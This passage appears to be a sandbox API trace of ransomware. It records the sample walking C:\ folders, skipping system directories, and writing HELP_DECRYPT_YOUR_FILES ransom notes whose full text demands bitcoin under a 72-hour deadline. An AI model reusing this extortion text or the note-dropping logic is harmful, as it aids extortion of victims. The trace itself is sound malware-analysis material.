	[0157.563] WriteFile (in: hFile=0x378, lpBuffer=0x18d978*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0 | out: lpBuffer=0x18d978*, lpNumberOfBytesWritten=0x18da90*=0x43, lpOverlapped=0x0) returned 1
	[0157.563] CloseHandle (hObject=0x378) returned 1
	[0157.564] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*" (normalized: "c:\\$recycle.bin\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7770c850, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98b0
	[0157.565] lstrlenW (lpString="C:\\$Recycle.Bin\\*.*") returned 19
	[0157.565] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.565] CharLowerBuffW (in: lpsz="C:\\$Recycle.Bin\\*.*", cchLength=0x13 | out: lpsz="c:\\$recycle.bin\\*.*") returned 0x13
	[0157.565] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.565] StrStrW (lpFirst="c:\\$recycle.bin\\*.*", lpSrch="windows") returned 0x0
	[0157.565] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.565] StrStrW (lpFirst="c:\\$recycle.bin\\*.*", lpSrch="boot") returned 0x0
	[0157.566] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.566] StrStrW (lpFirst="c:\\$recycle.bin\\*.*", lpSrch="system volume information") returned 0x0
	[0157.566] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.566] StrStrW (lpFirst="c:\\$recycle.bin\\*.*", lpSrch="$recycle.bin") returned="$recycle.bin\\*.*"
	[0157.566] FindClose (in: hFindFile=0xfb98b0 | out: hFindFile=0xfb98b0) returned 1
	[0157.566] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Boot", cAlternateFileName="")) returned 1
	[0157.567] lstrcmpW (lpString1="Boot", lpString2="..") returned 1
	[0157.567] lstrcmpW (lpString1="Boot", lpString2=".") returned 1
	[0157.567] lstrcpyW (in: lpString1=0x18e9cc, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0157.567] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.567] lstrcatW (in: lpString1="C:\\", lpString2="Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot"
	[0157.567] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot"
	[0157.567] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\"
	[0157.567] lstrcpyW (in: lpString1=0x18dab4, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\"
	[0157.567] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="*.*" | out: lpString1="C:\\Boot\\*.*") returned="C:\\Boot\\*.*"
	[0157.568] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*" (normalized: "c:\\boot\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0157.568] lstrlenW (lpString="C:\\Boot\\*.*") returned 11
	[0157.568] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.568] CharLowerBuffW (in: lpsz="C:\\Boot\\*.*", cchLength=0xb | out: lpsz="c:\\boot\\*.*") returned 0xb
	[0157.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.569] StrStrW (lpFirst="c:\\boot\\*.*", lpSrch="windows") returned 0x0
	[0157.569] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.569] StrStrW (lpFirst="c:\\boot\\*.*", lpSrch="boot") returned="boot\\*.*"
	[0157.569] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0157.569] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot"
	[0157.569] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\*.*" | out: lpString1="C:\\Boot\\*.*") returned="C:\\Boot\\*.*"
	[0157.569] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.570] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.570] wsprintfW (in: param_1=0x18d7b0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Boot\\HELP_DECRYPT_YOUR_FILES.TXT") returned 35
	[0157.570] CreateFileW (lpFileName="C:\\Boot\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\boot\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.580] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0157.580] WriteFile (in: hFile=0x378, lpBuffer=0x18cb68*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0 | out: lpBuffer=0x18cb68*, lpNumberOfBytesWritten=0x18da8c*=0xc46, lpOverlapped=0x0) returned 1
	[0157.583] CloseHandle (hObject=0x378) returned 1
	[0157.584] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cb38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cb38*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.585] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.585] GetUserNameA (in: lpBuffer=0x18ca1c, pcbBuffer=0x18cb34 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cb34) returned 1
	[0157.586] wsprintfW (in: param_1=0x18d9b8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0157.586] CreateFileW (lpFileName="C:\\Boot\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\boot\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.587] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0157.587] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0157.587] WriteFile (in: hFile=0x378, lpBuffer=0x18d9b8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0 | out: lpBuffer=0x18d9b8*, lpNumberOfBytesWritten=0x18da94*=0x30, lpOverlapped=0x0) returned 1
	[0157.587] CloseHandle (hObject=0x378) returned 1
	[0157.588] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.588] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.588] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0157.588] wsprintfW (in: param_1=0x18d770, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Boot\\HELP_DECRYPT_YOUR_FILES.HTML") returned 36
	[0157.588] CreateFileW (lpFileName="C:\\Boot\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\boot\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.589] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0157.589] WriteFile (in: hFile=0x378, lpBuffer=0x18cf64*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0 | out: lpBuffer=0x18cf64*, lpNumberOfBytesWritten=0x18da88*=0x808, lpOverlapped=0x0) returned 1
	[0157.592] CloseHandle (hObject=0x378) returned 1
	[0157.592] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0157.593] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cf4c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cf4c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.593] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.593] GetUserNameA (in: lpBuffer=0x18ce30, pcbBuffer=0x18cf48 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cf48) returned 1
	[0157.595] wsprintfA (in: param_1=0x18d978, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.595] CreateFileW (lpFileName="C:\\Boot\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\boot\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.596] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0157.596] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.596] WriteFile (in: hFile=0x378, lpBuffer=0x18d978*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0 | out: lpBuffer=0x18d978*, lpNumberOfBytesWritten=0x18da90*=0x43, lpOverlapped=0x0) returned 1
	[0157.596] CloseHandle (hObject=0x378) returned 1
	[0157.597] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*" (normalized: "c:\\boot\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x77758e55, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0157.597] lstrlenW (lpString="C:\\Boot\\*.*") returned 11
	[0157.597] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.597] CharLowerBuffW (in: lpsz="C:\\Boot\\*.*", cchLength=0xb | out: lpsz="c:\\boot\\*.*") returned 0xb
	[0157.597] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.598] StrStrW (lpFirst="c:\\boot\\*.*", lpSrch="windows") returned 0x0
	[0157.598] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.598] StrStrW (lpFirst="c:\\boot\\*.*", lpSrch="boot") returned="boot\\*.*"
	[0157.598] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0157.598] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x61b64, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="bootmgr", cAlternateFileName="")) returned 1
	[0157.598] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="BOOTNXT", cAlternateFileName="")) returned 1
	[0157.598] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x78d17e5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78d17e5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78d17e5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1
	[0157.598] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1
	[0157.599] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1
	[0157.599] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1
	[0157.599] lstrcpyW (in: lpString1=0x18e9cc, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0157.599] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.599] lstrcatW (in: lpString1="C:\\", lpString2="Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings"
	[0157.599] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings"
	[0157.599] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\"
	[0157.599] lstrcpyW (in: lpString1=0x18dab4, lpString2="C:\\Documents and Settings\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\"
	[0157.600] lstrcatW (in: lpString1="C:\\Documents and Settings\\", lpString2="*.*" | out: lpString1="C:\\Documents and Settings\\*.*") returned="C:\\Documents and Settings\\*.*"
	[0157.600] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*" (normalized: "c:\\documents and settings\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x77758e55, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xffffffff
	[0157.600] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0157.601] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings"
	[0157.601] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\*.*" | out: lpString1="C:\\Documents and Settings\\*.*") returned="C:\\Documents and Settings\\*.*"
	[0157.601] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.601] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.601] wsprintfW (in: param_1=0x18d7b0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Documents and Settings\\HELP_DECRYPT_YOUR_FILES.TXT") returned 53
	[0157.601] CreateFileW (lpFileName="C:\\Documents and Settings\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\documents and settings\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.618] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0157.619] WriteFile (in: hFile=0x378, lpBuffer=0x18cb68*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0 | out: lpBuffer=0x18cb68*, lpNumberOfBytesWritten=0x18da8c*=0xc46, lpOverlapped=0x0) returned 1
	[0157.622] CloseHandle (hObject=0x378) returned 1
	[0157.622] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cb38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cb38*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.622] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.623] GetUserNameA (in: lpBuffer=0x18ca1c, pcbBuffer=0x18cb34 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cb34) returned 1
	[0157.624] wsprintfW (in: param_1=0x18d9b8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0157.624] CreateFileW (lpFileName="C:\\Documents and Settings\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\documents and settings\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.624] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0157.624] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0157.625] WriteFile (in: hFile=0x378, lpBuffer=0x18d9b8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0 | out: lpBuffer=0x18d9b8*, lpNumberOfBytesWritten=0x18da94*=0x30, lpOverlapped=0x0) returned 1
	[0157.625] CloseHandle (hObject=0x378) returned 1
	[0157.625] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.626] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.626] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0157.626] wsprintfW (in: param_1=0x18d770, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Documents and Settings\\HELP_DECRYPT_YOUR_FILES.HTML") returned 54
	[0157.626] CreateFileW (lpFileName="C:\\Documents and Settings\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\documents and settings\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.627] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0157.627] WriteFile (in: hFile=0x378, lpBuffer=0x18cf64*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0 | out: lpBuffer=0x18cf64*, lpNumberOfBytesWritten=0x18da88*=0x808, lpOverlapped=0x0) returned 1
	[0157.630] CloseHandle (hObject=0x378) returned 1
	[0157.631] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0157.631] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cf4c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cf4c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.632] GetUserNameA (in: lpBuffer=0x18ce30, pcbBuffer=0x18cf48 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cf48) returned 1
